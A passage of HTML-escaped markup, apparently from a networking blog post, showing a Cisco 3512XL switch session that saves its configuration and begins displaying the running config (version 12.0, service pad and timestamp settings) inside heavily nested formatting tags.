configuration.&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span"  style="color:#0000FF;"&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;3512xl#&lt;b&gt;write memory&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;Building configuration...&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;br /&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;3512xl#&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;--------------------------------------------------------------------------------&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;br /&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;3512xl#&lt;b&gt;show running-config&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;Building configuration...&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;br /&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;Current configuration:&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;!&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;version 12.0&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;no service pad&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;service timestamps debug uptime&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;service timestamps log uptime&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span 